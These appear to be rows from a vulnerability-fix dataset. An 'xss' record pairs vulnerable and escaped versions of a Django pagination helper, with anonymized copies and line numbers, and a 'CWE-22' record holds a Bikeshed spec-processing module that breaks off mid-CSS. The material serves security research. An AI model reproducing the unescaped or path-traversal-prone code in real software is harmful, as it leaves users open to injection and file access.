"base_url": escape(context["base_url"]),
"is_paginated": context["is_paginated"],
"previous": previous_page_number,
"has_previous": page_object.has_previous(),
"next": next_page_number,
"has_next": page_object.has_next(),
"page": context["current_page_number"],
"pages": context["pages"],
"page_numbers": page_numbers,
"in_leading_range" : in_leading_range,
"in_trailing_range" : in_trailing_range,
"pages_outside_leading_range": pages_outside_leading_range,
"pages_outside_trailing_range": pages_outside_trailing_range,
}
def get_admin():
"""Returns an admin users, usefull for raising flags"""
try:
from django.contrib.auth.models import User
return User.objects.filter(is_superuser=True)[0]
except:
raise Exception('there is no admin users')
def generate_random_key(length=16):
"""return random string, length is number of characters"""
random.seed()
assert(isinstance(length, int))
format_string = '%0' + str(2*length) + 'x'
return format_string % random.getrandbits(length*8)
| xss | {
"code": [
" \"base_url\": context[\"base_url\"],"
],
"line_no": [
161
]
} | {
"code": [
" \"base_url\": escape(context[\"base_url\"]),"
],
"line_no": [
162
]
} | import re
import random
import .datetime
from django.utils.translation import ugettext as _
from django.utils.translation import ungettext
def FUNC_0(VAR_0, VAR_1):
try:
return VAR_0[VAR_1]
except:
return getattr(VAR_0, VAR_1)
def FUNC_1(VAR_2):
VAR_19 = enumerate(VAR_2, start = 1)
return [ '%d) %s' % item for item in VAR_19 ]
def FUNC_2(VAR_3):
VAR_20 = VAR_3.strip().split()
if len(VAR_20) > 0:
return ' ' + ' '.join(VAR_20) + ' '
else:
return ''
def FUNC_3(VAR_3):
VAR_3 = VAR_3.replace(',', ' ').replace(';', ' ')
return VAR_3.strip().split()
def FUNC_4(VAR_4):
if hasattr(VAR_4, '__iter__'):
return True
else:
return isinstance(VAR_4, basestring)
VAR_5 = re.compile(
r'bot|http|\.com|crawl|spider|python|curl|yandex'
)
VAR_6 = re.compile(
r'^(Mozilla.*(Gecko|KHTML|MSIE|Presto|Trident)|Opera).*$'
)
VAR_7 = re.compile(
r'(BlackBerry|HTC|LG|MOT|Nokia|NOKIAN|PLAYSTATION|PSP|SAMSUNG|SonyEricsson)'
)
def FUNC_5(VAR_3):
return re.sub('\s+', ' ', VAR_3).strip()
def FUNC_6(VAR_8):
if 'HTTP_ACCEPT_LANGUAGE' not in VAR_8.META:
return False
VAR_21 = VAR_8.META.get('HTTP_USER_AGENT', None)
if VAR_21 is None:
return False
if VAR_5.match(VAR_21, re.IGNORECASE):
return False
if VAR_7.match(VAR_21):
return True
if VAR_6.search(VAR_21):
return True
return False
def FUNC_7(VAR_9, VAR_10 = False):
VAR_22 = datetime.datetime.now()#datetime(*time.localtime()[0:6])#???
VAR_23 = VAR_22 - VAR_9
VAR_24 = VAR_23.days
VAR_25 = int(VAR_23.seconds/3600)
VAR_26 = int(VAR_23.seconds/60)
if VAR_24 > 2:
if VAR_9.year == VAR_22.year:
VAR_33 = VAR_9.strftime("%b %d")
else:
VAR_33 = VAR_9.strftime("%b %d '%y")
if VAR_10:
return _('on %(VAR_9)s') % { 'date': VAR_33 }
else:
return VAR_33
elif VAR_24 == 2:
return _('2 VAR_24 ago')
elif VAR_24 == 1:
return _('yesterday')
elif VAR_26 >= 60:
return ungettext(
'%(hr)d hour ago',
'%(hr)d VAR_25 ago',
VAR_25
) % {'hr':VAR_25}
else:
return ungettext(
'%(min)d min ago',
'%(min)d mins ago',
VAR_26
) % {'min':VAR_26}
VAR_11 = VAR_12 = 5
VAR_13 = VAR_14 = 4
VAR_15 = 1
VAR_16 = 2
def FUNC_8(VAR_17):
if (VAR_17["is_paginated"]):
" Initialize variables "
VAR_28 = VAR_29 = False
VAR_30 = VAR_31 = range(0)
if (VAR_17["pages"] <= VAR_11):
VAR_28 = VAR_29 = True
VAR_34 = [n for n in range(1, VAR_17["pages"] + 1) if n > 0 and n <= VAR_17["pages"]]
elif (VAR_17["current_page_number"] <= VAR_13):
VAR_28 = True
VAR_34 = [n for n in range(1, VAR_11 + 1) if n > 0 and n <= VAR_17["pages"]]
VAR_30 = [n + VAR_17["pages"] for n in range(0, -VAR_15, -1)]
elif (VAR_17["current_page_number"] > VAR_17["pages"] - VAR_14):
VAR_29 = True
VAR_34 = [n for n in range(VAR_17["pages"] - VAR_12 + 1, VAR_17["pages"] + 1) if n > 0 and n <= VAR_17["pages"]]
VAR_31 = [n + 1 for n in range(0, VAR_15)]
else:
VAR_34 = [n for n in range(VAR_17["current_page_number"] - VAR_16, VAR_17["current_page_number"] + VAR_16 + 1) if n > 0 and n <= VAR_17["pages"]]
VAR_30 = [n + VAR_17["pages"] for n in range(0, -VAR_15, -1)]
VAR_31 = [n + 1 for n in range(0, VAR_15)]
VAR_32 = VAR_17['page_object']
if VAR_32.has_previous():
VAR_35 = VAR_32.previous_page_number()
else:
VAR_35 = None
if VAR_32.has_next():
VAR_36 = VAR_32.next_page_number()
else:
VAR_36 = None
return {
"base_url": VAR_17["base_url"],
"is_paginated": VAR_17["is_paginated"],
"previous": VAR_35,
"has_previous": VAR_32.has_previous(),
"next": VAR_36,
"has_next": VAR_32.has_next(),
"page": VAR_17["current_page_number"],
"pages": VAR_17["pages"],
"page_numbers": VAR_34,
"in_leading_range" : VAR_28,
"in_trailing_range" : VAR_29,
"pages_outside_leading_range": VAR_30,
"pages_outside_trailing_range": VAR_31,
}
def FUNC_9():
try:
from django.contrib.auth.models import User
return User.objects.filter(is_superuser=True)[0]
except:
raise Exception('there is no admin users')
def FUNC_10(VAR_18=16):
random.seed()
assert(isinstance(VAR_18, int))
VAR_27 = '%0' + str(2*VAR_18) + 'x'
return VAR_27 % random.getrandbits(VAR_18*8)
| import re
import random
import .datetime
from django.utils.translation import ugettext as _
from django.utils.translation import ungettext
from django.utils.html import escape
def FUNC_0(VAR_0, VAR_1):
try:
return VAR_0[VAR_1]
except:
return getattr(VAR_0, VAR_1)
def FUNC_1(VAR_2):
VAR_19 = enumerate(VAR_2, start = 1)
return [ '%d) %s' % item for item in VAR_19 ]
def FUNC_2(VAR_3):
VAR_20 = VAR_3.strip().split()
if len(VAR_20) > 0:
return ' ' + ' '.join(VAR_20) + ' '
else:
return ''
def FUNC_3(VAR_3):
VAR_3 = VAR_3.replace(',', ' ').replace(';', ' ')
return VAR_3.strip().split()
def FUNC_4(VAR_4):
if hasattr(VAR_4, '__iter__'):
return True
else:
return isinstance(VAR_4, basestring)
VAR_5 = re.compile(
r'bot|http|\.com|crawl|spider|python|curl|yandex'
)
VAR_6 = re.compile(
r'^(Mozilla.*(Gecko|KHTML|MSIE|Presto|Trident)|Opera).*$'
)
VAR_7 = re.compile(
r'(BlackBerry|HTC|LG|MOT|Nokia|NOKIAN|PLAYSTATION|PSP|SAMSUNG|SonyEricsson)'
)
def FUNC_5(VAR_3):
return re.sub('\s+', ' ', VAR_3).strip()
def FUNC_6(VAR_8):
if 'HTTP_ACCEPT_LANGUAGE' not in VAR_8.META:
return False
VAR_21 = VAR_8.META.get('HTTP_USER_AGENT', None)
if VAR_21 is None:
return False
if VAR_5.match(VAR_21, re.IGNORECASE):
return False
if VAR_7.match(VAR_21):
return True
if VAR_6.search(VAR_21):
return True
return False
def FUNC_7(VAR_9, VAR_10 = False):
VAR_22 = datetime.datetime.now()#datetime(*time.localtime()[0:6])#???
VAR_23 = VAR_22 - VAR_9
VAR_24 = VAR_23.days
VAR_25 = int(VAR_23.seconds/3600)
VAR_26 = int(VAR_23.seconds/60)
if VAR_24 > 2:
if VAR_9.year == VAR_22.year:
VAR_33 = VAR_9.strftime("%b %d")
else:
VAR_33 = VAR_9.strftime("%b %d '%y")
if VAR_10:
return _('on %(VAR_9)s') % { 'date': VAR_33 }
else:
return VAR_33
elif VAR_24 == 2:
return _('2 VAR_24 ago')
elif VAR_24 == 1:
return _('yesterday')
elif VAR_26 >= 60:
return ungettext(
'%(hr)d hour ago',
'%(hr)d VAR_25 ago',
VAR_25
) % {'hr':VAR_25}
else:
return ungettext(
'%(min)d min ago',
'%(min)d mins ago',
VAR_26
) % {'min':VAR_26}
VAR_11 = VAR_12 = 5
VAR_13 = VAR_14 = 4
VAR_15 = 1
VAR_16 = 2
def FUNC_8(VAR_17):
if (VAR_17["is_paginated"]):
" Initialize variables "
VAR_28 = VAR_29 = False
VAR_30 = VAR_31 = range(0)
if (VAR_17["pages"] <= VAR_11):
VAR_28 = VAR_29 = True
VAR_34 = [n for n in range(1, VAR_17["pages"] + 1) if n > 0 and n <= VAR_17["pages"]]
elif (VAR_17["current_page_number"] <= VAR_13):
VAR_28 = True
VAR_34 = [n for n in range(1, VAR_11 + 1) if n > 0 and n <= VAR_17["pages"]]
VAR_30 = [n + VAR_17["pages"] for n in range(0, -VAR_15, -1)]
elif (VAR_17["current_page_number"] > VAR_17["pages"] - VAR_14):
VAR_29 = True
VAR_34 = [n for n in range(VAR_17["pages"] - VAR_12 + 1, VAR_17["pages"] + 1) if n > 0 and n <= VAR_17["pages"]]
VAR_31 = [n + 1 for n in range(0, VAR_15)]
else:
VAR_34 = [n for n in range(VAR_17["current_page_number"] - VAR_16, VAR_17["current_page_number"] + VAR_16 + 1) if n > 0 and n <= VAR_17["pages"]]
VAR_30 = [n + VAR_17["pages"] for n in range(0, -VAR_15, -1)]
VAR_31 = [n + 1 for n in range(0, VAR_15)]
VAR_32 = VAR_17['page_object']
if VAR_32.has_previous():
VAR_35 = VAR_32.previous_page_number()
else:
VAR_35 = None
if VAR_32.has_next():
VAR_36 = VAR_32.next_page_number()
else:
VAR_36 = None
return {
"base_url": escape(VAR_17["base_url"]),
"is_paginated": VAR_17["is_paginated"],
"previous": VAR_35,
"has_previous": VAR_32.has_previous(),
"next": VAR_36,
"has_next": VAR_32.has_next(),
"page": VAR_17["current_page_number"],
"pages": VAR_17["pages"],
"page_numbers": VAR_34,
"in_leading_range" : VAR_28,
"in_trailing_range" : VAR_29,
"pages_outside_leading_range": VAR_30,
"pages_outside_trailing_range": VAR_31,
}
def FUNC_9():
try:
from django.contrib.auth.models import User
return User.objects.filter(is_superuser=True)[0]
except:
raise Exception('there is no admin users')
def FUNC_10(VAR_18=16):
random.seed()
assert(isinstance(VAR_18, int))
VAR_27 = '%0' + str(2*VAR_18) + 'x'
return VAR_27 % random.getrandbits(VAR_18*8)
| [
6,
12,
13,
20,
32,
40,
46,
56,
57,
62,
63,
65,
68,
72,
75,
78,
81,
83,
90,
116,
117,
131,
147,
149,
154,
159,
175,
183,
190,
15,
16,
17,
22,
23,
24,
25,
26,
34,
35,
36,
37,
59,
60,
123,
124,
125,
126,
177,
185
] | [
7,
13,
14,
21,
33,
41,
47,
57,
58,
63,
64,
66,
69,
73,
76,
79,
82,
84,
91,
117,
118,
132,
148,
150,
155,
160,
176,
184,
191,
16,
17,
18,
23,
24,
25,
26,
27,
35,
36,
37,
38,
60,
61,
124,
125,
126,
127,
178,
186
] |
0CWE-22
| import glob
import os
import sys
from collections import defaultdict
from functools import partial as curry
from . import (
biblio,
boilerplate,
caniuse,
conditional,
config,
constants,
datablocks,
dfns,
extensions,
fingerprinting,
h,
headings,
highlight,
idl,
includes,
inlineTags,
lint,
markdown,
mdnspeclinks,
metadata,
shorthands,
wpt,
)
from .func import Functor
from .h import *
from .InputSource import FileInputSource, InputSource
from .messages import *
from .refs import ReferenceManager
from .unsortedJunk import *
class Spec:
def __init__(
self,
inputFilename,
debug=False,
token=None,
lineNumbers=False,
fileRequester=None,
testing=False,
):
self.valid = False
self.lineNumbers = lineNumbers
if lineNumbers:
# line-numbers are too hacky, so force this to be a dry run
constants.dryRun = True
if inputFilename is None:
inputFilename = findImplicitInputFile()
if inputFilename is None: # still
die(
"No input file specified, and no *.bs or *.src.html files found in current directory.\nPlease specify an input file, or use - to pipe from STDIN."
)
return
self.inputSource = InputSource(inputFilename)
self.transitiveDependencies = set()
self.debug = debug
self.token = token
self.testing = testing
if fileRequester is None:
self.dataFile = config.defaultRequester
else:
self.dataFile = fileRequester
self.md = None
self.mdBaseline = None
self.mdDocument = None
self.mdCommandLine = None
self.mdDefaults = None
self.mdOverridingDefaults = None
self.lines = []
self.document = None
self.html = None
self.head = None
self.body = None
self.fillContainers = None
self.valid = self.initializeState()
def initializeState(self):
self.normativeRefs = {}
self.informativeRefs = {}
self.refs = ReferenceManager(fileRequester=self.dataFile, testing=self.testing)
self.externalRefsUsed = defaultdict(lambda: defaultdict(dict))
self.md = None
self.mdBaseline = metadata.MetadataManager()
self.mdDocument = None
self.mdCommandLine = metadata.MetadataManager()
self.mdDefaults = None
self.mdOverridingDefaults = None
self.biblios = {}
self.typeExpansions = {}
self.macros = defaultdict(lambda x: "???")
self.canIUse = {}
self.mdnSpecLinks = {}
self.widl = idl.getParser()
self.testSuites = json.loads(self.dataFile.fetch("test-suites.json", str=True))
self.languages = json.loads(self.dataFile.fetch("languages.json", str=True))
self.extraStyles = defaultdict(str)
self.extraStyles["style-colors"] = styleColors
self.extraStyles["style-darkmode"] = styleDarkMode
self.extraStyles["style-md-lists"] = styleMdLists
self.extraStyles["style-autolinks"] = styleAutolinks
self.extraStyles["style-selflinks"] = styleSelflinks
self.extraStyles["style-counters"] = styleCounters
self.extraScripts = defaultdict(str)
try:
inputContent = self.inputSource.read()
self.lines = inputContent.lines
if inputContent.date is not None:
self.mdBaseline.addParsedData("Date", inputContent.date)
except FileNotFoundError:
die(
"Couldn't find the input file at the specified location '{0}'.",
self.inputSource,
)
return False
except OSError:
die("Couldn't open the input file '{0}'.", self.inputSource)
return False
return True
def recordDependencies(self, *inputSources):
self.transitiveDependencies.update(inputSources)
def preprocess(self):
self.transitiveDependencies.clear()
self.assembleDocument()
self.processDocument()
def assembleDocument(self):
# Textual hacks
stripBOM(self)
if self.lineNumbers:
self.lines = hackyLineNumbers(self.lines)
self.lines = markdown.stripComments(self.lines)
self.recordDependencies(self.inputSource)
# Extract and process metadata
self.lines, self.mdDocument = metadata.parse(lines=self.lines)
# First load the metadata sources from 'local' data
self.md = metadata.join(self.mdBaseline, self.mdDocument, self.mdCommandLine)
# Using that to determine the Group and Status, load the correct defaults.include boilerplate
self.mdDefaults = metadata.fromJson(
data=config.retrieveBoilerplateFile(self, "defaults", error=True),
source="defaults",
)
self.md = metadata.join(
self.mdBaseline, self.mdDefaults, self.mdDocument, self.mdCommandLine
)
# Using all of that, load up the text macros so I can sub them into the computed-metadata file.
self.md.fillTextMacros(self.macros, doc=self)
jsonEscapedMacros = {k: json.dumps(v)[1:-1] for k, v in self.macros.items()}
computedMdText = replaceMacros(
config.retrieveBoilerplateFile(self, "computed-metadata", error=True),
macros=jsonEscapedMacros,
)
self.mdOverridingDefaults = metadata.fromJson(
data=computedMdText, source="computed-metadata"
)
self.md = metadata.join(
self.mdBaseline,
self.mdDefaults,
self.mdOverridingDefaults,
self.mdDocument,
self.mdCommandLine,
)
# Finally, compute the "implicit" things.
self.md.computeImplicitMetadata(doc=self)
# And compute macros again, in case the preceding steps changed them.
self.md.fillTextMacros(self.macros, doc=self)
self.md.validate()
extensions.load(self)
# Initialize things
self.refs.initializeRefs(self)
self.refs.initializeBiblio()
# Deal with further <pre> blocks, and markdown
self.lines = datablocks.transformDataBlocks(self, self.lines)
self.lines = markdown.parse(
self.lines,
self.md.indent,
opaqueElements=self.md.opaqueElements,
blockElements=self.md.blockElements,
)
# Note that, currently, markdown.parse returns an array of strings, not of Line objects.
self.refs.setSpecData(self.md)
# Convert to a single string of html now, for convenience.
self.html = "".join(line.text for line in self.lines)
boilerplate.addHeaderFooter(self)
self.html = self.fixText(self.html)
# Build the document
self.document = parseDocument(self.html)
self.head = find("head", self)
self.body = find("body", self)
correctH1(self)
includes.processInclusions(self)
metadata.parseDoc(self)
def processDocument(self):
# Fill in and clean up a bunch of data
conditional.processConditionals(self)
self.fillContainers = locateFillContainers(self)
lint.exampleIDs(self)
boilerplate.addBikeshedVersion(self)
boilerplate.addCanonicalURL(self)
boilerplate.addFavicon(self)
boilerplate.addSpecVersion(self)
boilerplate.addStatusSection(self)
boilerplate.addLogo(self)
boilerplate.addCopyright(self)
boilerplate.addSpecMetadataSection(self)
boilerplate.addAbstract(self)
boilerplate.addExpiryNotice(self)
boilerplate.addObsoletionNotice(self)
boilerplate.addAtRisk(self)
addNoteHeaders(self)
boilerplate.removeUnwantedBoilerplate(self)
wpt.processWptElements(self)
shorthands.run(self)
inlineTags.processTags(self)
canonicalizeShortcuts(self)
addImplicitAlgorithms(self)
fixManualDefTables(self)
headings.processHeadings(self)
checkVarHygiene(self)
processIssuesAndExamples(self)
idl.markupIDL(self)
inlineRemoteIssues(self)
addImageSize(self)
# Handle all the links
processBiblioLinks(self)
processDfns(self)
idl.processIDL(self)
dfns.annotateDfns(self)
formatArgumentdefTables(self)
formatElementdefTables(self)
processAutolinks(self)
biblio.dedupBiblioReferences(self)
verifyUsageOfAllLocalBiblios(self)
caniuse.addCanIUsePanels(self)
boilerplate.addIndexSection(self)
boilerplate.addExplicitIndexes(self)
boilerplate.addStyles(self)
boilerplate.addReferencesSection(self)
boilerplate.addPropertyIndex(self)
boilerplate.addIDLSection(self)
boilerplate.addIssuesSection(self)
boilerplate.addCustomBoilerplate(self)
headings.processHeadings(self, "all") # again
boilerplate.removeUnwantedBoilerplate(self)
boilerplate.addTOCSection(self)
addSelfLinks(self)
processAutolinks(self)
boilerplate.addAnnotations(self)
boilerplate.removeUnwantedBoilerplate(self)
# Add MDN panels after all IDs/anchors have been added
mdnspeclinks.addMdnPanels(self)
highlight.addSyntaxHighlighting(self)
boilerplate.addBikeshedBoilerplate(self)
fingerprinting.addTrackingVector(self)
fixIntraDocumentReferences(self)
fixInterDocumentReferences(self)
removeMultipleLinks(self)
forceCrossorigin(self)
lint.brokenLinks(self)
lint.accidental2119(self)
lint.missingExposed(self)
lint.requiredIDs(self)
lint.unusedInternalDfns(self)
# Any final HTML cleanups
cleanupHTML(self)
if self.md.prepTR:
# Don't try and override the W3C's icon.
for el in findAll("[rel ~= 'icon']", self):
removeNode(el)
# Make sure the W3C stylesheet is after all other styles.
for el in findAll("link", self):
if el.get("href").startswith("https://www.w3.org/StyleSheets/TR"):
appendChild(find("head", self), el)
# Ensure that all W3C links are https.
for el in findAll("a", self):
href = el.get("href", "")
if href.startswith("http://www.w3.org") or href.startswith(
"http://lists.w3.org"
):
el.set("href", "https" + href[4:])
text = el.text or ""
if text.startswith("http://www.w3.org") or text.startswith(
"http://lists.w3.org"
):
el.text = "https" + text[4:]
# Loaded from .include files
extensions.BSPrepTR(self) # pylint: disable=no-member
return self
def serialize(self):
try:
rendered = h.Serializer(
self.md.opaqueElements, self.md.blockElements
).serialize(self.document)
except Exception as e:
die("{0}", e)
return
rendered = finalHackyCleanup(rendered)
return rendered
def fixMissingOutputFilename(self, outputFilename):
if outputFilename is None:
# More sensible defaults!
if not isinstance(self.inputSource, FileInputSource):
outputFilename = "-"
elif self.inputSource.sourceName.endswith(".bs"):
outputFilename = self.inputSource.sourceName[0:-3] + ".html"
elif self.inputSource.sourceName.endswith(".src.html"):
outputFilename = self.inputSource.sourceName[0:-9] + ".html"
else:
outputFilename = "-"
return outputFilename
def finish(self, outputFilename=None, newline=None):
self.printResultMessage()
outputFilename = self.fixMissingOutputFilename(outputFilename)
rendered = self.serialize()
if not constants.dryRun:
try:
if outputFilename == "-":
sys.stdout.write(rendered)
else:
with open(
outputFilename, "w", encoding="utf-8", newline=newline
) as f:
f.write(rendered)
except Exception as e:
die(
"Something prevented me from saving the output document to {0}:\n{1}",
outputFilename,
e,
)
def printResultMessage(self):
# If I reach this point, I've succeeded, but maybe with reservations.
fatals = messageCounts["fatal"]
links = messageCounts["linkerror"]
warnings = messageCounts["warning"]
if self.lineNumbers:
warn("Because --line-numbers was used, no output was saved.")
if fatals:
success("Successfully generated, but fatal errors were suppressed")
return
if links:
success("Successfully generated, with {0} linking errors", links)
return
if warnings:
success("Successfully generated, with warnings")
return
def watch(self, outputFilename, port=None, localhost=False):
import time
outputFilename = self.fixMissingOutputFilename(outputFilename)
if self.inputSource.mtime() is None:
die(f"Watch mode doesn't support {self.inputSource}")
if outputFilename == "-":
die("Watch mode doesn't support streaming to STDOUT.")
return
if port:
# Serve the folder on an HTTP server
import http.server
import socketserver
import threading
class SilentServer(http.server.SimpleHTTPRequestHandler):
def log_message(self, format, *args):
pass
socketserver.TCPServer.allow_reuse_address = True
server = socketserver.TCPServer(
("localhost" if localhost else "", port), SilentServer
)
print(f"Serving at port {port}")
thread = threading.Thread(target=server.serve_forever)
thread.daemon = True
thread.start()
else:
server = None
mdCommandLine = self.mdCommandLine
try:
self.preprocess()
self.finish(outputFilename)
lastInputModified = {
dep: dep.mtime() for dep in self.transitiveDependencies
}
p("==============DONE==============")
try:
while True:
# Comparing mtimes with "!=" handles when a file starts or
# stops existing, and it's fine to rebuild if an mtime
# somehow gets older.
if any(
input.mtime() != lastModified
for input, lastModified in lastInputModified.items()
):
resetSeenMessages()
p("Source file modified. Rebuilding...")
self.initializeState()
self.mdCommandLine = mdCommandLine
self.preprocess()
self.finish(outputFilename)
lastInputModified = {
dep: dep.mtime() for dep in self.transitiveDependencies
}
p("==============DONE==============")
time.sleep(1)
except KeyboardInterrupt:
p("Exiting~")
if server:
server.shutdown()
thread.join()
sys.exit(0)
except Exception as e:
die("Something went wrong while watching the file:\n{0}", e)
def fixText(self, text, moreMacros={}):
# Do several textual replacements that need to happen *before* the document is parsed as h.
# If markdown shorthands are on, remove all `foo`s while processing,
# so their contents don't accidentally trigger other stuff.
# Also handle markdown escapes.
if "markdown" in self.md.markupShorthands:
textFunctor = MarkdownCodeSpans(text)
else:
textFunctor = Functor(text)
macros = dict(self.macros, **moreMacros)
textFunctor = textFunctor.map(curry(replaceMacros, macros=macros))
textFunctor = textFunctor.map(fixTypography)
if "css" in self.md.markupShorthands:
textFunctor = textFunctor.map(replaceAwkwardCSSShorthands)
return textFunctor.extract()
def printTargets(self):
p("Exported terms:")
for el in findAll("[data-export]", self):
for term in config.linkTextsFromElement(el):
p(" " + term)
p("Unexported terms:")
for el in findAll("[data-noexport]", self):
for term in config.linkTextsFromElement(el):
p(" " + term)
def isOpaqueElement(self, el):
if el.tag in self.md.opaqueElements:
return True
if el.get("data-opaque") is not None:
return True
return False
def findImplicitInputFile():
"""
Find what input file the user *probably* wants to use,
by scanning the current folder.
In preference order:
1. index.bs
2. Overview.bs
3. the first file with a .bs extension
4. the first file with a .src.html extension
"""
if os.path.isfile("index.bs"):
return "index.bs"
if os.path.isfile("Overview.bs"):
return "Overview.bs"
allBs = glob.glob("*.bs")
if allBs:
return allBs[0]
allHtml = glob.glob("*.src.html")
if allHtml:
return allHtml[0]
return None
constants.specClass = Spec
styleColors = """
/* Any --*-text not paired with a --*-bg is assumed to have a transparent bg */
:root {
color-scheme: light dark;
--text: black;
--bg: white;
--unofficial-watermark: url(https://www.w3.org/StyleSheets/TR/2016/logos/UD-watermark);
--logo-bg: #1a5e9a;
--logo-active-bg: #c00;
--logo-text: white;
--tocnav-normal-text: #707070;
--tocnav-normal-bg: var(--bg);
--tocnav-hover-text: var(--tocnav-normal-text);
--tocnav-hover-bg: #f8f8f8;
--tocnav-active-text: #c00;
--tocnav-active-bg: var(--tocnav-normal-bg);
--tocsidebar-text: var(--text);
--tocsidebar-bg: #f7f8f9;
--tocsidebar-shadow: rgba(0,0,0,.1);
--tocsidebar-heading-text: hsla(203,20%,40%,.7);
--toclink-text: var(--text);
--toclink-underline: #3980b5;
--toclink-visited-text: var(--toclink-text);
--toclink-visited-underline: #054572;
--heading-text: #005a9c;
--hr-text: var(--text);
--algo-border: #def;
--del-text: red;
--del-bg: transparent;
--ins-text: #080;
--ins-bg: transparent;
--a-normal-text: #034575;
--a-normal-underline: #bbb;
--a-visited-text: var(--a-normal-text);
--a-visited-underline: #707070;
--a-hover-bg: rgba(75%, 75%, 75%, .25);
--a-active-text: #c00;
--a-active-underline: #c00;
--blockquote-border: silver;
--blockquote-bg: transparent;
--blockquote-text: currentcolor;
--issue-border: #e05252;
--issue-bg: #fbe9e9;
--issue-text: var(--text);
--issueheading-text: #831616;
--example-border: #e0cb52;
--example-bg: #fcfaee;
--example-text: var(--text);
--exampleheading-text: #574b0f;
--note-border: #52e052;
--note-bg: #e9fbe9;
--note-text: var(--text);
--noteheading-text: hsl(120, 70%, 30%);
--notesummary-underline: silver;
--assertion-border: #aaa;
--assertion-bg: #eee;
--assertion-text: black;
--advisement-border: orange;
--advisement-bg: #fec;
--advisement-text: var(--text);
--advisementheading-text: #b35f00;
--warning-border: red;
--warning-bg: hsla(40,100%,50%,0.95);
--warning-text: var(--text);
--amendment-border: #330099;
--amendment-bg: #F5F0FF;
--amendment-text: var(--text);
--amendmentheading-text: #220066;
--def-border: #8ccbf2;
--def-bg: #def;
--def-text: var(--text);
--defrow-border: #bbd7e9;
--datacell-border: silver;
--indexinfo-text: #707070;
--indextable-hover-text: black;
--indextable-hover-bg: #f7f8f9;
--outdatedspec-bg: rgba(0, 0, 0, .5);
--outdatedspec-text: black;
--outdated-bg: maroon;
--outdated-text: white;
--outdated-shadow: red;
--editedrec-bg: darkorange;
}"""
styleDarkMode = """
@media (prefers-color-scheme: dark) {
:root {
--text: #ddd;
--bg: black;
--unofficial-watermark: url("data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' width='400' height='400'%3E%3Cg fill='%23100808' transform='translate(200 200) rotate(-45) translate(-200 -200)' stroke='%23100808' stroke-width='3'%3E%3Ctext x='50%25' y='220' style='font: bold 70px sans-serif; text-anchor: middle; letter-spacing: 6px;'%3EUNOFFICIAL%3C/text%3E%3Ctext x='50%25' y='305' style='font: bold 70px sans-serif; text-anchor: middle; letter-spacing: 6px;'%3EDRAFT%3C/text%3E%3C/g%3E%3C/svg%3E");
--logo-bg: #1a5e9a;
--logo-active-bg: #c00;
--logo-text: white;
--tocnav-normal-text: #999;
--tocnav-normal-bg: var(--bg);
--tocnav-hover-text: var(--tocnav-normal-text);
--tocnav-hover-bg: #080808;
--tocnav-active-text: #f44;
--tocnav-active-bg: var(--tocnav-normal-bg);
--tocsidebar-text: var(--text);
--tocsidebar-bg: #080808;
--tocsidebar-shadow: rgba(255,255,255,.1);
--tocsidebar-heading-text: hsla(203,20%,40%,.7);
--toclink-text: var(--text);
--toclink-underline: #6af;
--toclink-visited-text: var(--toclink-text);
--toclink-visited-underline: #054572;
--heading-text: #8af;
--hr-text: var(--text);
--algo-border: #456;
--del-text: #f44;
--del-bg: transparent;
--ins-text: #4a4;
--ins-bg: transparent;
--a-normal-text: #6af;
--a-normal-underline: #555;
--a-visited-text: var(--a-normal-text);
--a-visited-underline: var(--a-normal-underline);
--a-hover-bg: rgba(25%, 25%, 25%, .2);
--a-active-text: #f44;
--a-active-underline: var(--a-active-text);
--borderedblock-bg: rgba(255, 255, 255, .05);
--blockquote-border: silver;
--blockquote-bg: var(--borderedblock-bg);
--blockquote-text: currentcolor;
--issue-border: #e05252;
--issue-bg: var(--borderedblock-bg);
--issue-text: var(--text);
--issueheading-text: hsl(0deg, 70%, 70%);
--example-border: hsl(50deg, 90%, 60%);
--example-bg: var(--borderedblock-bg);
--example-text: var(--text);
--exampleheading-text: hsl(50deg, 70%, 70%);
--note-border: hsl(120deg, 100%, 35%);
--note-bg: var(--borderedblock-bg);
--note-text: var(--text);
--noteheading-text: hsl(120, 70%, 70%);
--notesummary-underline: silver;
--assertion-border: #444;
--assertion-bg: var(--borderedblock-bg);
--assertion-text: var(--text);
--advisement-border: orange;
--advisement-bg: #222218;
--advisement-text: var(--text);
--advisementheading-text: #f84;
--warning-border: red;
--warning-bg: hsla(40,100%,20%,0.95);
--warning-text: var(--text);
--amendment-border: #330099;
--amendment-bg: #080010;
--amendment-text: var(--text);
--amendmentheading-text: #cc00ff;
--def-border: #8ccbf2;
--def-bg: #080818;
--def-text: var(--text);
--defrow-border: #136;
--datacell-border: silver;
--indexinfo-text: #aaa;
--indextable-hover-text: var(--text);
--indextable-hover-bg: #181818;
--outdatedspec-bg: rgba(255, 255, 255, .5);
--outdatedspec-text: black;
--outdated-bg: maroon;
--outdated-text: white;
--outdated-shadow: red;
--editedrec-bg: darkorange;
}
/* In case a transparent-bg image doesn't expect to be on a dark bg,
which is quite common in practice... */
img { background: white; }
}"""
styleMdLists = """
/* This is a weird hack for me not yet following the commonmark spec
regarding paragraph and lists. */
[data-md] > :first-child {
margin-top: 0;
}
[data-md] > :last-child {
margin-bottom: 0;
}"""
styleAutolinks = """
.css.css, .property.property, .descriptor.descriptor {
color: var(--a-normal-text);
font-size: inherit;
font-family: inherit;
}
.css::before, .property::before, .descriptor::before {
content: "‘";
}
.css::after, .property::after, .descriptor::after {
content: "’";
}
.property, .descriptor {
/* Don't wrap property and descriptor names */
white-space: nowrap;
}
.type { /* CSS value <type> */
font-style: italic;
}
pre .property::before, pre .property::after {
content: "";
}
[data-link-type="property"]::before,
[data-link-type="propdesc"]::before,
[data-link-type="descriptor"]::before,
[data-link-type="value"]::before,
[data-link-type="function"]::before,
[data-link-type="at-rule"]::before,
[data-link-type="selector"]::before,
[data-link-type="maybe"]::before {
content: "‘";
}
[data-link-type="property"]::after,
[data-link-type="propdesc"]::after,
[data-link-type="descriptor"]::after,
[data-link-type="value"]::after,
[data-link-type="function"]::after,
[data-link-type="at-rule"]::after,
[data-link-type="selector"]::after,
[data-link-type="maybe"]::after {
content: "’";
}
[data-link-type].production::before,
[data-link-type].production::after,
.prod [data-link-type]::before,
.prod [data-link-type]::after {
content: "";
}
[data-link-type=element],
[data-link-type=element-attr] {
font-family: Menlo, Consolas, "DejaVu Sans Mono", monospace;
font-size: .9em;
}
[data-link-type=element]::before { content: "<" }
[data-link-type=element]::after { content: ">" }
[data-link-type=biblio] {
white-space: pre;
}"""
styleSelflinks = """
:root {
--selflink-text: white;
--selflink-bg: gray;
--selflink-hover-text: black;
}
